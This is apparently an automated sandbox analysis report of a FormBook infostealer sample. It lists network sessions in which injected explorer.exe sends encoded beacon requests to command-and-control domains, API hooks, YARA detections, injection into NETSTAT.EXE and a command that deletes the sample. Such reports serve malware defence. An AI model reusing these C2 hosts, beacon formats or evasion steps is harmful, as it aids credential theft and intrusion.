                                    Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 49 59 61 4a 76 76 43 69 2f 72 65 4a 6a 4e 71 68 4f 31 2f 4f 34 44 64 47 31 45 51 56 52 53 72 48 67 33 4e 73 6b 53 44 56 35 79 2f 4b 52 48 6b 35 44 65 68 75 30 6d 79 6b 72 35 34 4c 66 6f 39 4c 75 72 52 75 53 71 6d 37 37 51 43 4e 72 2b 46 55 51 73 37 71 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PIYaJvvCi/reJjNqhO1/O4DdG1EQVRSrHg3NskSDV5y/KRHk5Dehu0mykr54Lfo9LurRuSqm77QCNr+FUQs7qA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.449770185.107.56.5780C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2021 20:54:28.274372101 CET5228OUTGET /kgw/?tTrL=Fpgl&D81dO=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN3tuV7ElJqtC HTTP/1.1
                                    Host: www.pxwuo.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jan 13, 2021 20:54:28.352443933 CET5228INHTTP/1.1 302 Found
                                    cache-control: max-age=0, private, must-revalidate
                                    connection: close
                                    content-length: 11
                                    date: Wed, 13 Jan 2021 19:54:27 GMT
                                    location: http://survey-smiles.com
                                    server: nginx
                                    set-cookie: sid=25126a6a-55d9-11eb-adb8-0c1aa1b569be; path=/; domain=.pxwuo.com; expires=Mon, 31 Jan 2089 23:08:35 GMT; max-age=2147483647; HttpOnly
                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                    Data Ascii: Redirecting


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.44977134.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2021 20:54:48.906574011 CET5229OUTGET /kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl HTTP/1.1
                                    Host: www.outlawgospelshow.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jan 13, 2021 20:54:49.045675993 CET5230INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Wed, 13 Jan 2021 19:54:48 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "5ffc8399-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.44977235.186.238.10180C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2021 20:55:09.354315042 CET5231OUTGET /kgw/?tTrL=Fpgl&D81dO=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UcoIa2V5gzCm HTTP/1.1
                                    Host: www.karybeautycare.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jan 13, 2021 20:55:09.493736029 CET5231INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Wed, 13 Jan 2021 19:55:09 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "5ffc82d4-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE5
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE5
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE5
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE5

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:20:52:35
                                    Start date:13/01/2021
                                    Path:C:\Users\user\Desktop\65BV6gbGFl.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\65BV6gbGFl.exe'
                                    Imagebase:0xc70000
                                    File size:724992 bytes
                                    MD5 hash:DEED11E2B4B23DBE0C9EF99B5390BD6F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:20:52:42
                                    Start date:13/01/2021
                                    Path:C:\Users\user\Desktop\65BV6gbGFl.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\65BV6gbGFl.exe
                                    Imagebase:0x700000
                                    File size:724992 bytes
                                    MD5 hash:DEED11E2B4B23DBE0C9EF99B5390BD6F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:20:52:44
                                    Start date:13/01/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:20:52:59
                                    Start date:13/01/2021
                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                    Imagebase:0xf10000
                                    File size:32768 bytes
                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:20:53:04
                                    Start date:13/01/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\65BV6gbGFl.exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:20:53:04
                                    Start date:13/01/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >